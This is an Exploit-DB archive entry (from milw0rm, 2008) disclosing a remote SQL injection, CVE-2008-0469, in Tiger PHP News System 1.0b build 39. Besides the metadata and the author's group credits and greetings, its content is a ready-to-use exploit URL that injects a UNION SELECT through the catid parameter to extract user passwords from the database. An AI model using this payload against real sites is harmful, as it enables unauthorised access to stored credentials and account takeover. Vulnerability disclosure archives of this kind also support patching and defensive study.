Tiger PHP News System 1.0b build 39 - Remote SQL Injection Vulnerability

2008-01-25T00:00:00
ID EDB-ID:4984
Type exploitdb
Reporter 0in
Modified 2008-01-25T00:00:00

Description

Tiger PHP News System 1.0b build 39 Remote SQL Injection Vulnerability. CVE-2008-0469. Webapps exploit for php platform

                                        
                                            /*
 *Tiger PHP News System SQL Injection
 *Bug found bY 0in from DaRk-Coders Group!
 *Homepage: http://dark-coders.4rh.eu or http://dark-coders.prv.pl
 *IRC:#dark-coders at irc.freenode.org
 *Email: 0in(dot)email(at)gmail(dot)com
*/

 Script home: http://tpns.k-na.se/
 Exploit: http://localhost/?page=newscat&catid=-666%20union%20select%20passwd%20from%20user

 Greetings to:All Dark-Coders Team Members - Die-Angel,m4r1usz,suN8Hclf,Djlinux,
 Aristo89

# milw0rm.com [2008-01-25]